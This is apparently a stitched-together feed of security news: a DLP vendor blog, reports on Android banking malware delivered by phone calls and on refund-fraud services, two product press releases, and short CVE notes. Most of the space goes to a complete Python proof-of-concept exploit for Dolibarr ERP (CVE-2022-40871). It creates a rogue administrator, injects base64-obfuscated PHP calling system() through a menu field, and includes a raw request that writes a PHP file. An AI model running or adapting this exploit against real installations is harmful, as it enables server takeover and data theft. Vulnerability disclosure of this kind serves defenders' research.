Automation means more attacks. It also means smarter, easier-to-implement prevention techniques. Here are five signs it is time to put your own data loss prevention strategy into place.

Whether due to cyberattacks or employee negligence, data transfers to unauthorized parties (known as data leaks) can be catastrophic for organizations of any size. The rise of behavior-based data loss prevention (DLP) software has made it possible to proactively head off such threats without requiring months to implement, teams to manage, or a doctorate in privacy law to understand.

But does your organization and the data you protect require a higher level of protection?

Whether you're an managed services provider (MSP) weighing whether to launch DLP services or an enterprise trying to decide if it's finally time to adopt a DLP solution, here are five indications that the answer is a resounding "yes":

**1\. Your employees (or end users) have access to particularly sensitive data on their endpoints.**

More than 80% of data breaches are perpetuated with a financial motive, according to Verizon's "2022 Data Breach Investigations Report." Cybercriminals target high-value data that includes trade secrets, intellectual property, and any highly regulated information that can be leveraged for personal gain.

Whether stored on local workstations or in the cloud, if it's accessible on end users' endpoints, sensitive data is at risk of leakage through network channels and peripheral devices. DLP solutions dramatically reduce the likelihood of this happening — intentionally or accidentally. For organizations with high-value data accessible on corporate endpoints, failure to proactively protect against data leaks can easily result in severe financial and reputational harm.

**2\. You protect data in highly regulated industries.**

Do you (or your client organizations) work with personally identifiable information (PII), patient health information (PHI), cardholder data, or any other form of especially sensitive and regulated data? If so, you have a critical need for higher levels of data protection than simple backup can provide.

Most of these regulations — such as the GDPR, HIPAA, and PCI-DSS — stipulate severe fines for compromising events that lead to leakage of sensitive data. They also require the timely reporting of such events. DLP solutions help on both fronts: preventing leaks from occurring in the first place while also enabling a holistic view of data flows within the organization and supporting forensic investigations in case of an incident.

**3\. You (or your clients) are particularly prone to attacks and data leak risks.**

Historically, industries that store particularly valuable data and those known to rely on vulnerable tool sets are prime targets for focused cyberattacks — especially for industries that must make some of their data sets publicly accessible to some extent. Education, healthcare, and government agencies are just a few such examples, and cyberattacks against all of these have generated plenty of headlines in the past year, showcasing the higher risks these organizations face.

Behavior-based DLP technologies can help you to secure sensitive data in an intelligent way, ensuring that it remains protected and any attempt to transfer it to unauthorized parties is blocked. Cybercriminals are constantly evolving their tactics, so make sure that you meet them head-on with cutting-edge technologies.

**4\. You need to support remote work or BYOD policies.**

Whether hybrid or fully remote, a decentralized approach to the office has become commonplace. In many industries, it's even expected.

But while employees may be happier to work from home, this model is not without security risks. Working outside of a traditional office environment opens up the risk of man-in-the-middle (MitM) attacks, where threat actors intercept communications between the device and corporate network. Without the right software in place, keeping track of data flows across a distributed environment is particularly difficult.

Remote work and a BYOD approach to corporate data access has also increased the threat posed by phishing campaigns. Attackers continue to target unsuspecting employees with password-stealing websites and malware, taking advantage of unsecured devices and the tool sets that end users must navigate to perform their job from home. While training employees to recognize suspicious communications remains important, human error is inevitable — and adopting DLP solutions will dramatically limit the damage from such incidents.

**5\. You've invested in cyber insurance (or are considering it).**

Cyber insurance is a smart investment for nearly any modern organization, one intended to cover your damages in the event of a cybersecurity failure. The cost is variable and depends on factors including your revenue, industry, data sensitivity — and yes, the security measures you've put in place to reduce the likelihood of a breach.

Just as a safe driving record or the installation of anti-theft devices can help to reduce auto insurance premiums, so, too, can a proactive approach to data loss prevention be used to lower cyber-insurance payments. Depending on your specific situation and insurer, it may even be necessary to meet basic data safety requirements and keep your DLP policies aligned with business specifics.

**Smarter Data Protection Through DLP**

Whether lost accidentally or due to nefarious activity, data exfiltration can lead to irreparable financial harm through severe regulatory fines, the loss of trade secrets and a general undermining of customer confidence.

For larger businesses with an existing security team — especially one that has relevant experience in this space — adopting on-premises enterprise DLP software will bring powerful benefits. Those companies that currently lack this expertise may find it more economical to work with an MSP, as establishing your own DLP initiative from the ground up (including training and configuration) can be complex and costly otherwise.

For MSPs themselves, behavior-based DLP solutions empower you to prevent data leakage from client workloads via both network communications and peripheral devices — with unmatched simplicity of provisioning, configuration, and management. Continuous monitoring of data flows and automated policy creation and extension ensure holistic protection of sensitive information with minimal manual involvement and make it significantly easier to maintain regulatory compliance, and can even support lowered cyber-insurance premiums.

**About the Author**

    

Iliyan Gerov is a Senior Product Marketing Specialist at Acronis.

5 Signs That It's Time to Invest in Data Loss Prevention

Malicious actors are resorting to voice phishing (vishing) tactics to dupe victims into installing Android malware on their devices, new research from ThreatFabric reveals.
The Dutch mobile security company said it identified a network of phishing websites targeting Italian online-banking users that are designed to get hold of their contact details.
Telephone-oriented attack delivery (TOAD), as

Malicious actors are resorting to voice phishing (vishing) tactics to dupe victims into installing Android malware on their devices, new research from ThreatFabric reveals.

The Dutch mobile security company said it identified a network of phishing websites targeting Italian online-banking users that are designed to get hold of their contact details.

Telephone-oriented attack delivery (TOAD), as the social engineering technique is called, involves calling the victims using previously collected information from fraudulent websites.

The caller, who purports to be a support agent for the bank, instructs the individual, on the other hand, to install a security app and grant it extensive permissions, when, in reality, it's malicious software intended to gain remote access or conduct financial fraud.

In this case, it leads to the deployment of an Android malware dubbed Copybara, a mobile trojan first detected in November 2021 and is primarily used to perform on-device fraud via overlay attacks targeting Italian users. Copybara has also been confused with another malware family known as BRATA.

ThreatFabric assessed the TOAD-based campaigns to have commenced around the same time, indicating that the activity has been ongoing for nearly a year.

Like any other Android-based malware, Copybara's RAT capabilities are powered by abusing the operating system's accessibility services API to gather sensitive information and even uninstall the downloader app to reduce its forensic footprint.

What's more, the infrastructure utilized by the threat actor has been found to deliver a second malware named SMS Spy that enables the adversary to gain access to all incoming SMS messages and intercept one-time passwords (OTPs) sent by banks.

The new wave of hybrid fraud attacks presents a new dimension for scammers to mount convincing Android malware campaigns that have otherwise relied on traditional methods such as Google Play Store droppers, rogue ads, and smishing.

"Such attacks require more resources on \[threat actors'\] side and are more sophisticated to perform and maintain," ThreatFabric's Mobile Threat Intelligence (MTI) team told The Hacker News.

"We also like to point out that targeted attacks from a fraud success perspective are unfortunately more successful, at least in this specific campaign."

This is not the first time TOAD tactics are being employed to orchestrate banking malware campaigns. Last month, the MalwareHunterTeam detailed a similar attack aimed at users of the Indian bank Axis Bank in a bid to install an info-stealer that impersonates a credit card rewards app.

"Any suspicious call should be double checked by calling your financial organization," the MTI team said, adding "financial organizations should provide their customers with knowledge about ongoing campaigns and enhance the client apps with mechanisms to detect suspicious activity."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Using Vishing to Trick Victims into Installing Android Banking Malware

Research from Netacea reveals that as of September 2022, there are over 1,600 professional refund service adverts on hacker forums.

Cybercrime’s continued shift to a service-driven economy has enabled several new professionalized hacking services with Refund Fraud-as-a-Service being one of the latest to rise in popularity over the last few years. This is according to Netacea’s latest threat report, which researched rising trends across a multitude of hacking forums.

Refund fraud is the abuse of refund policies for financial gain and costs e-commerce businesses more than $25 billion every year. Those interested in committing refund fraud can outsource the process to professional social engineers offering Refund-as-a-Service. This poses a significant challenge to retailers, as previously legitimate customers can enlist highly experienced fraudsters to perpetrate this fraud on their behalf, making it difficult to identify fraudulent activity. As online shopping continues its upward trend, professional fraudsters will look to cash in on the opportunity.

Netacea’s research also found:

*   Over 540 new refund fraud service adverts were identified in the first three quarters of 2022
*   Refund fraud services increased by almost 150% from 2019 – 2021

Netacea’s report explores the current structure of the underground Refund-as-a-Service market, the changing tactics and methods used by adversarial groups to perform refund fraud, and how threat intelligence and fraud teams can work collaboratively to effectively combat it.

“As shown in the rise of ransomware-as-a-service attacks, cybercriminals have shifted to a service-based economy — and refund fraud is no exception” said Cyril Noel-Tagoe, Principal Security Researcher, Netacea. “As we approach Black Friday and the holiday season, e-commerce stores should take the necessary steps to reduce their risk of refund fraud, including educating employees on the methods and tactics fraudsters take.”

Additional steps include:

1.  Delivery carriers should replace or complement signatures with one-time passwords to prevent refund fraudsters from claiming that packages did not arrive.
2.  E-commerce stores and delivery carriers should work together to look for patterns in their data sets that may indicate fraudulent activity.
3.  Reputation is power in the underground market. In the instance that an e-commerce store identifies the claim to be fraudulent after a refund payment has been made, the store should rebill the customer’s account. An influx of rebill complaints from customers may cause the refund fraud service to drop the retailer from their store list, to avoid negative reviews.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Refund Fraud-as-a-Service Ads on Hacker Forums Increase by 60%

Security AI-driven Attack Signal Intelligence automates cyber threat detection, triage, and prioritization across public cloud, SaaS, identity and networks.

**SAN JOSE, Calif., Oct. 12, 2022 /PRNewswire/** — Vectra AI, the leader in Security AI-driven hybrid cloud threat detection and response, today announced Attack Signal Intelligence — groundbreaking technology that automates threat detection, triage and prioritization for SOC teams.

As organizations face ever-growing unknown cyber threats targeting on-premises and cloud infrastructure, SaaS applications, and data and identity systems, SOC teams are challenged to keep pace. More attack surface to cover combined with more modern, evasive and sophisticated attackers has resulted in more manual time spent maintaining detection rules, triaging alerts and figuring out what alerts to prioritize — resulting in analyst fatigue and burnout. Vectra's Security AI-driven Attack Signal Intelligence frees security analysts of these everyday manual and mundane tasks and arms them to do what they do best — investigate and respond to real attacks. Core to the Vectra platform, Vectra MDR services and the expanding Vectra ecosystem, Attack Signal Intelligence empowers security analysts to:

*   **Think like an attacker** with AI-driven Detections that go beyond signatures and anomalies to understand attacker behavior and zero in on attacker TTPs across the cyber kill chain.
*   **Know what is malicious** by analyzing detection patterns unique to an organization's environment to surface relevant events and reduce noise.
*   **Focus on the urgent** with AI-driven Prioritization that provides a view of threats by severity and impact, enabling analysts to focus on responding to critical threats and lowering business risk.

Today's security teams are challenged with defending an ever-expanding attack surface and more evasive attacker methods while contending with overwhelming alert noise. These challenges all contribute to a threat actors' increasing ability to beat prevention tools, circumvent signatures and detection rules and bypass multifactor authentication to infiltrate and progress laterally inside an organization while going unnoticed. According to Vectra's Global Research Study, 72% of security practitioners believe that they have been breached but don't know it.

"The unknown compromise is the single biggest security risk organizations face today. Far more complex environments with greater attack surface exposure, more evasive attacker methods and overwhelming noise are all leading to unknowns for security teams," said Kevin Kennedy, SVP of Product at Vectra. "To erase these unknowns, security teams need more reliable, accurate and timely intelligence across all attack entry points and attack surfaces. Vectra's Attack Signal Intelligence is the first technology of its kind to automate threat detection, triage and prioritization so defenders can get ahead and stay ahead of modern attacks. Threat intelligence gives security the confidence to mitigate what is known. Vectra Attack Signal intelligence gives security the confidence to mitigate what was previously unknown."

By harnessing Attack Signal Intelligence with the Vectra platform, Vectra MDR services and the Vectra ecosystem, security teams detect real attacks and their progression throughout the cyber kill chain so they can rapidly investigate and stop an attack from becoming a breach. Contrast to approaches that leverage AI for anomaly detection and require human tuning and maintenance, Vectra Attack Signal Intelligence continuously and automatically monitors for attacker methods with a set of Security AI models programmed with an understanding of attacker TTPs. The results run through another layer of AI which combines an understanding of the organization's environment with threat models and human threat intelligence, to automatically surface and prioritize threats based on severity and impact. The result is that security teams are 85% more efficient in identifying actual threats and achieve >2x higher security operations productivity.

Vectra Attack Signal Intelligence is built into all Vectra Cloud, Identity and Network Threat Detection and Response products and services:

*   Vectra CDR for AWS
*   Vectra CDR for Microsoft 365
*   Vectra IDR for Microsoft Azure AD
*   Vectra NDR for on-premises and cloud networks
*   Vectra MDR for cloud, identity and network threat detection and response

**For more information on Vectra's Attack Signal Intelligence, please visit:**

Vectra Attack Signal Intelligence web page: https://www.vectra.ai/products/attack-signal-intelligence

Blog: Attack Signal Intelligence Commits to Erasing Unknown Threats in Your Organization: www.vectra.ai/blog/vectra-attack-signal-intelligence

Attack Signal Intelligence Solution Brief: www.vectra.ai/resources/attack-signal-intelligence

**About Vectra**

Vectra® is the leader in Security AI-driven hybrid cloud threat detection and response. Only Vectra optimizes AI to detect attacker methods — the TTPs at the heart of all attacks — rather than simplistically alerting on "different." The resulting high-fidelity threat signal and clear context enables cybersecurity teams to rapidly respond to threats and stop attacks from becoming breaches. The Vectra platform and services cover public cloud, SaaS applications, identity systems and network infrastructure — both on-premises and cloud-based. Organizations worldwide rely on the Vectra platform and services for resilience to ransomware, supply chain compromise, identity takeovers, and other cyberattacks impacting their organization. For more information, visit vectra.ai.

**SOURCE:** Vectra

Vectra Advances Security AI to Deliver Attack Signal Intelligence™, Empowering Security Teams to Investigate and Respond to Attacks in Real Time

Early adopters reaping the benefits of improved SOC operations and efficiencies.

**SANTA CLARA, Calif., Oct. 12, 2022 /PRNewswire/** — Delivering on the promise to help organizations leverage massive scales of data for their defenses, Palo Alto Networks (NASDAQ: PANW) today announced the general availability of Cortex® XSIAM, a breakthrough autonomous security operations platform powering today's modern secure operations center (SOC) and fundamentally changing the way data, analytics and automation are used across enterprise and cloud security operations.

Earlier this year, Cortex XSIAM was made available to a number of top organizations through the XSIAM Design Partner Program. The design partners spanned healthcare, logistics, design and manufacturing, technology, public sector, and entertainment verticals. The common challenges these organizations face include overwhelming alert volumes accompanied by a high number of false positives, lack of visibility across all parts of the organization, including cloud environments, and excessive manual overhead associated with managing numerous siloed tools.

"The SOC is where some of the best cybersecurity professionals work, and it is time that they have the right platform to get their jobs done effectively. We want to give our customers a new approach to SOC operations with a focus on results, efficiency and productivity," said Lee Klarich, chief product officer, Palo Alto Networks. "Cortex XSIAM establishes an autonomous SOC where organizations can respond to threats in a fraction of the time it takes today, and analysts can focus on the highest priority incidents. The SOC of the future will be built on AI and automation — any other approach is destined for failure."

Palo Alto Networks operates its own SOC on Cortex XSIAM and has seen the benefits of intelligent data integration, machine learning-based threat models, extensive automation and proactive analysis of the IT environment to reduce the attack surface. The Palo Alto Networks SOC processes over one trillion events per month, with Cortex XSIAM automatically handling the vast majority of those events. On average, the Cortex-powered SOC detects threats in 10 seconds and responds to high priority threats in one minute, with an 80% reduction in alerts that SOC analysts need to analyze.

The feedback on XSIAM has been strong. Design partners consistently reported improved visibility, fewer incidents, reduced false positives and reduced mean time to response. Paul Alexander, director of IT operations at Imagination Technologies Group, an international leader in the creation and licensing of semiconductor System-on-Chip Intellectual Property, said, "XSIAM is already helping us to resolve and address threats way more quickly and efficiently, reduce risk and track metrics."

"We see XSIAM as a platform that combines multiple capabilities into one unified ecosystem," said David Norlin, CISO at Lumifi. "For us, that means empowering analysts to move quicker on multiple datasets, detect threats more comprehensively, and deliver an even better service to our clients."

"From our first demo of XSIAM as part of the early access program, we were shocked and impressed with the maturity of the platform," said Randy Watkins, chief technology officer at Critical Start. "This was not a beta product, but a solution that customers would immediately be able to build their entire security operations program around. The data models within XSIAM are some of the best approaches we've seen to solving the lack of consistency with log management."

"XSIAM aims at much more than SIEM and provides the engine for the autonomous SOC," said Bobby Brillhart, vice president of engineering at Norlem. "XSIAM creates unprecedented opportunities for us as an MDR provider to scale our services and significantly decrease our MTTR."

**Optimized for Cloud-Native Environments**

By design, XSIAM operates across both cloud and enterprise security operations, providing true end-to-end management of threats, wherever they originate. Unlike most existing SIEM products, XSIAM comes with the ability to collect and integrate cloud telemetry that is unique to cloud-native systems. While companies born in the cloud benefit from the scale and automation of XSIAM and the ease of integration with public cloud and SaaS telemetry, organizations with legacy SIEM deployments can seamlessly transition to XSIAM as the next-generation autonomous SOC platform.

**Availability**

Cortex XSIAM is now available globally with full support across multiple cloud locations to comply with local regulations.

**Additional Resources**

*   Register for Palo Alto Networks' November event: The Modern SOC, Reimagined.
*   Join us at Ignite, Palo Alto Networks customer conference, to learn more and see XSIAM in action.
*   Follow Palo Alto Networks on Twitter, LinkedIn, Facebook and Instagram.

**About Palo Alto Networks**

Palo Alto Networks is the world's cybersecurity leader. We innovate to outpace cyberthreats, so organizations can embrace technology with confidence. We provide next-gen cybersecurity to thousands of customers globally, across all sectors. Our best-in-class cybersecurity platforms and services are backed by industry-leading threat intelligence and strengthened by state-of-the-art automation. Whether deploying our products to enable the Zero Trust Enterprise, responding to a security incident, or partnering to deliver better security outcomes through a world-class partner ecosystem, we're committed to helping ensure each day is safer than the one before. It's what makes us the cybersecurity partner of choice.

At Palo Alto Networks, we're committed to bringing together the very best people in service of our mission, so we're also proud to be the cybersecurity workplace of choice, recognized among Newsweek's Most Loved Workplaces (2021), Comparably Best Companies for Diversity (2021)and HRC Best Places for LGBTQ Equality (2022). For more information, visit www.paloaltonetworks.com.

_Palo Alto Networks, Cortex, and the Palo Alto Networks logo are registered trademarks of Palo Alto Networks, Inc. in the United States and in jurisdictions throughout the world. All other trademarks, trade names, or service marks used or mentioned herein belong to their respective owners. Any unreleased services or features (and any services or features not generally available to customers) referenced in this or other press releases or public statements are not currently available (or are not yet generally available to customers) and may not be delivered when expected or at all. Customers who purchase Palo Alto Networks applications should make their purchase decisions based on services and features currently generally available._

**SOURCE:** Palo Alto Networks, Inc.

Palo Alto Networks Ushers in the Next-Generation Security Operations Center With General Availability of Cortex XSIAM — the Autonomous Security Operations Platform

Dolibarr ERP & CRM <=15.0.3 is vulnerable to Eval injection. By default, any administrator can be added to the installation page of dolibarr, and if successfully added, malicious code can be inserted into the database and then execute it by eval.

**2022/10/08 update**

POC:

import requests
from requests.packages import urllib3
import time
import random
import sys
import re

sess \= requests.Session()
pcre \= re.compile(r'name=\\"token\\"\\s+value=\\"(\[^>\]+)\\"\\s\*\[/\]\*>')
def request(method, url, headers\=None, data\=None, proxies\=None, timeout\=30):
    i \= 1
    urllib3.disable\_warnings()
    resp \= None
    proxies \= proxies
    while i <= 3:
        try:
            resp \= sess.request(method\=method, url\=url, headers\=headers,
                                    data\=data, proxies\=proxies, timeout\=timeout, verify\=False)
            break
        except requests.exceptions.TooManyRedirects:
            break
        except requests.exceptions.ConnectionError as e:
            time.sleep(2 + random.randint(1, 4))
        except (requests.exceptions.ConnectTimeout, requests.exceptions.ReadTimeout, requests.exceptions.Timeout):
            time.sleep(2 + random.randint(1, 4))
        finally:
            i += 1
    if i \> 3:
        print('\[-\]Error retrieve with max retries: {}'.format(url))
    return resp

def exp():
    if len(sys.argv) < 2:
        sys.exit('Usage: python3 {} http://xxxxx.com/'.format(sys.argv\[0\]))
    if sys.argv\[1\]\[\-1\] \== '/':
        base \= sys.argv\[1\].rsplit('/', 1)\[0\]
    else:
        base \= sys.argv\[1\]
    headers \= {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36',
    }
    #proxies = {'http': 'http://127.0.0.1:8082', 'https': 'http://127.0.0.1:8082'}
    proxies \= None
    res \= request('GET', base, headers\=headers, proxies\=proxies)
    err\_flag \= 1
    if res:
        print('\[\*\] Attempt to add admin.')
        base \= res.url.rsplit('/', 1)\[0\]
        add\_admin\_url \= '{}/install/step5.php'.format(base)
        data \= {
            'action': 'set',
            'login': 'testadmins',
            'pass': 'testadmins',
            'pass\_verif': 'testadmins',
            'selectlang': 'auto'
        }
        headers\['Content-Type'\] \= 'application/x-www-form-urlencoded'
        res \= request('POST', add\_admin\_url, headers\=headers, data\=data, proxies\=proxies)
        if res and 'created successfully' in res.text or ('exists' in res.text and 'Email  already exists' not in res.text):
            csrf\_token\_url \= '{}/index.php'.format(base)
            res \= request('GET', csrf\_token\_url, headers\=headers, proxies\=proxies)
            if res:
                print('\[\*\] Attempt to login.')
                try:
                    csrf\_token \= pcre.findall(res.text)\[0\]
                except:
                    csrf\_token \= ''
                login\_url \= '{}/index.php?mainmenu=home'.format(base)
                headers\['Referer'\] \= csrf\_token\_url
                data \= {
                    'token':'{}'.format(csrf\_token),
                    'actionlogin': 'login',
                    'loginfunction': 'loginfunction',
                    'username': 'testadmins',
                    'password': 'testadmins'
                }
                res \= request('POST', login\_url, headers\=headers, data\=data, proxies\=proxies)
                if res and res.status\_code \== 200 and 'logout.php' in res.text:
                    print('\[\*\] Attempt to get csrf token.')
                    csrf\_token\_url \= '{}/admin/menus/edit.php?menuId=0&action=create&menu\_handler=eldy\_menu'.format(base)
                    res \= request('GET', csrf\_token\_url, headers\=headers, proxies\=proxies)
                    if res:
                        print('\[\*\] Attemp to inset evil data.')
                        try:
                            csrf\_token \= pcre.findall(res.text)\[0\]
                        except:
                            csrf\_token \= ''
                        inset\_evil\_url \= '{}/admin/menus/edit.php'.format(base)
                        data \= {
                            'token': '{}'.format(csrf\_token),
                            'action': 'add',
                            'menuId': random.randint(10000, 99999),
                            'menu\_handler': 'eldy\_menu',
                            'user': 2,
                            'type': 1,
                            'titre': 1,
                            'url': 1,
                            'enabled': "1==1));$d=base64\_decode('ZWNobyAnPCEtLScmJmVjaG8gcHduZWQhISEmJmlkJiZlY2hvJy0tPic=');$a=base64\_decode('c3lzdGVt');$a($d);//" #execute id command，bypass core/lib/function.lib.php limits
                        }
                        res \= request('POST', inset\_evil\_url, headers\=headers, data\=data, proxies\=proxies)
                        if res and res.history\[0\].status\_code \== 302:
                            print('\[\*\] Attemp to execute command.')
                            request('GET', '{}/admin/menus/index.php'.format(base), headers\=headers, proxies\=proxies)
                            time.sleep(3)
                            evil\_url \= '{}/admin/index.php'.format(base)
                            res \= request('GET', evil\_url, headers\=headers, proxies\=proxies)
                            if res and res.status\_code \== 200 and 'pwned!!!' in res.text:
                                print(res.text\[:100\])
                                print('\[+\] vulnrable! {}'.format(base))
                                err\_flag \= 0
                    
    if err\_flag:
        print('\[-\] {} is not exploitable.'.format(sys.argv\[1\]))

exp()

**1\. Introduction**

Dolibarr ERP & CRM is a modern software package that helps manage your organization's activity (contacts, suppliers, invoices, orders, stocks, agenda…).

It's an Open Source Software suite (written in PHP with optional JavaScript enhancements) designed for small, medium or large companies, foundations and freelancers.

dolibarr<=15.0.3 has an arbitrary add administrator vulnerability and a backend remote code execution vulnerability.

**2\. Vulnerability****2.1 add super administrators without authorization**

Dolibarr does not automatically add install.lock after installation, it needs to be added manually by the user in the documents directory. For this feature, you can add as many super administrators as you want, using the section for adding super administrators during installation: install/step4.php.

**2.2 Backend RCE**

Firstly, use the edit function of menus to add malicious data to the database, here we use file_put_contents to write files.

    POST /dolibarr1502/htdocs/admin/menus/edit.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 299
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/dolibarr/htdocs/admin/menus/edit.php?menuId=0&action=create&menu_handler=eldy&backtopage=%2Fdolibarr%2Fhtdocs%2Fadmin%2Fmenus%2Findex.php
    Cookie: PHPSESSID=mtkbsit3sr99f9relns8b9isbf; DOLINSTALLNOPING_017fb6a80b4fcc706353a7f3b168d939=1; DOLSESSID_90637d005b446cd27f1f5444eb5ac092=2m4fegod13gk193u8g7js4nql5
    Upgrade-Insecure-Requests: 1
    
    token=5de221f6658ef66579740ae1636d24a6&action=add&menuId=12345671&menu_handler=eldy_menu&user=2&type=1&titre=1&url=1&enabled=1%3D%3D1%29%29%3B%24a%3Dbase64_decode%28%27ZmlsZV9wdXRfY29udGVudHM%3D%27%29%3B%24a%28%27.1234.php%27%2Cbase64_decode%28%27PD9waHAgcGhwaW5mbygpOz8%2BCg%3D%3D%27%29%29%3B%2F%2F
    

View the database table llx_menu and successfully add malicious data:

Secondly, access to http://localhost/dolibarr1502/htdocs/admin/menus/index.php, will generate malicious PHP files in the admin/menus/ directory.

**3\. Analysis**

The dol_eval function in htdocs/core/lib/functions.lib.php can execute arbitrary code, the dol\_eval caller also in the verifCond function in this file. If you can control $s and bypass the forbidden restriction (bypass with php features: **variable functions**), you can execute arbitrary code.

Looking for controllable calls to the verifCond function, I found the menuLoad method in htdocs/core/class/menubase.class.php. The menuLoad method has two calls to verifCond.

But $memu is fetched from the database, so go ahead and look at the logic of the $resql statement. Focus on the table: MAIN_DB_PREFIX.menu, and m.entity in (0, $conf->entity), m.menu_handler IN ($this->db->escape($menu_handler),'all')". And $menu_handler is the parameter passed in. The condition to be satisfied is: eldy

$sql = "SELECT m.rowid, m.type, m.module, m.fk\_menu, m.fk\_mainmenu, m.fk\_leftmenu, m.url, m.titre, m.langs, m.perms, m.enabled, m.target, m.mainmenu, m.leftmenu, m.position";
$sql .= " FROM ".MAIN\_DB\_PREFIX."menu as m";
$sql .= " WHERE m.entity IN (0,".$conf\->entity.")";
$sql .= " AND m.menu\_handler IN ('".$this\->db\->escape($menu\_handler)."','all')";
if ($type\_user == 0) $sql .= " AND m.usertype IN (0,2)";
if ($type\_user == 1) $sql .= " AND m.usertype IN (1,2)";
$sql .= " ORDER BY m.position, m.rowid";

So, we need to find the code to insert or modify the table MAIN_DB_PREFIX.menu.

The create function, also located in htdocs/core/class/menubase.class.php, is used to add a piece of data to MAIN_DB_PREFIX.menu, focusing on perms, enabled, entity, and menu_handler. handler, where entityis$conf->entity\` which just meets the conditions described above.

Keep track of the remaining three variables, located in htdocs/admin/menus/edit.php, all of which we can control.

CVE-2022-40871: GitHub - youncyb/dolibarr-rce: DOLIBARR ERP & CRM  rce

Under certain conditions, the application SAP BusinessObjects Business Intelligence Platform (Version Management System) exposes sensitive information to an actor over the network with high privileges that is not explicitly authorized to have access to that information, leading to a high impact on Confidentiality.

CVE-2022-35296

SAP BusinessObjects Business Intelligence platform (Analysis for OLAP) - versions 420, 430, allows an authenticated attacker to send user-controlled inputs when OLAP connections are created and edited in the Central Management Console. On successful exploitation, there could be a limited impact on confidentiality and integrity of the application.

CVE-2022-41206

The Xiaomi Security Center expresses heartfelt thanks to ADLab of VenusTech ! At the same time, we also welcome more outstanding and professional security experts and security teams to join the Mi Security Center (MiSRC) to jointly ensure the safe access of millions of Xiaomi users worldwide Life.

Xiaomi welcomes security experts and research teams to join our Vulnerability Disclosure Program (VDP). Xiaomi is commited to taking the responsibility to the security of our users around the world can enjoy a secure and reliable intelligent life.

For the security vulnerabilities disclosed in this page, Xiaomi does not imply any kind of guarantee or warranty, either express or implied, including the warranties of merchantability or fitness for a particular purpose or non-infringement. You understand the vulnerabilities disclosure information is just to provide reference for you to assess security risk and make appropriate decision. Your use of the document, by whatsoever means, will be totally at your own risk. In no event shall Xiaomi or be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

CVE-2020-14131: Xiaomi Security Center

A logic vulnerability exists in a Xiaomi product. The vulnerability is caused by an identity verification failure, which can be exploited by an attacker who can obtain a brief elevation of privilege.

Tag

#intel